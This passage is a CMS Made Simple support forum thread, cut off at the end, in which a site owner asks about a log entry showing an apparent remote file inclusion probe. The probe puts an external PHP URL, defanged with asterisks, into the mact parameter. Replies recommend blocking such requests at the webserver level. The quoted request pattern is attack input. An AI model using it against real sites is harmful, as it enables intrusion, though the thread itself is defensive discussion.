I was just looking in some logs and I see some useragent is trying to add strange url`s, does anyone know if this is a risk ?


Host: ********** (changed)

/index.php?mact=http:****//0xg3458.hub.io/pb****.php? (the **** are put in by myself to make it a wrong link)

Http Code: 200 Date: Sep 19 23:09:06 Http Version: HTTP/1.1 Size in Bytes: 10786

Referer: -

Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

Yeah, it's something to worry about.

_________________
Follow me on twitter
--
if you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
----------------
Don't make me angry..... you won't like me when I'm angry....

and whats the best thing to do about it?

Analyze the url, see if they're fishing, or if there's a potential vulnerability in the code that they're trying to exploit, then potentially fool with your firewall rules to block that account

and/or fool with mod security to reject those queries.... use caution here though, as you could block some valid behaviour.

_________________
Follow me on twitter
--
if you can't bother explaining your problem well, you shouldn't expect much in the way of assistance.
----------------
Don't make me angry..... you won't like me when I'm angry....

Ok thanks,

Well the url http:****//0xg3458.hub.io/pb****.php?  now gives this message ;

The web page you are trying to access has been removed by our server administrator.
We do not allow porn pages (anything with complete nudity) or any illegal pages!

Before that it looked like a compressed php script, so i guess they already deleted it at 2ip.com which owns hub**.io

When i tried to do the same thing it basicly gave me a 404 and redirect me to my homepage becuase a .htaccess rule which redirects all 404 error to the homepage.

It was tried 2 times from different IP`s, cant find any new tries though

The only thing that uses "index.php?mact" is the news module.

he or she just tried:  http://www.domain.ltd/index.php?mact=ht ... pb****.php?

Well as far as my knowledge goes, I cant find anything that could be harmed with that.

No, it's a normal call for modules
Maybe a try for a possible include (and URL fopen wrappers enabled)
I have not check in source if mact does include but I don't think

Alby

_________________
CMSMS Support Team
Italian Admin and Moderator

Plugins: Geolocate hostip, Multiple random image, Image rotator (beta), Content Pagination
Modules: ForumMadeSimple (Howto), TranslationManager
Multilingual: MLE is not CMSMS

+1. Beware such queries. Don't let them reach PHP. Block them before at the webserver level. Here are some hints with mod_rewrite.

Pierre M.

_________________
-- Pierre, support team member. comodérateur du forum francophone.
Please read "how to submit installation/support requests" before posting. Don't send private messages to ask for support.
Want to contribute to CMSms ? Improve the wiki with your forum account.

URL f_open is disabled in the php.ini.

Thanks for the link, i`ll look into that, I have been slacking to enable pretty url`s fot this site, so i`ll first look at making the website use mod_rewrite pretty url and blocking potential risky requests.

Well if looked at blocking these attacks with .htaccess

And it works very well, added a few extry lines, besides the ones Pierre pointed out, for blocking  "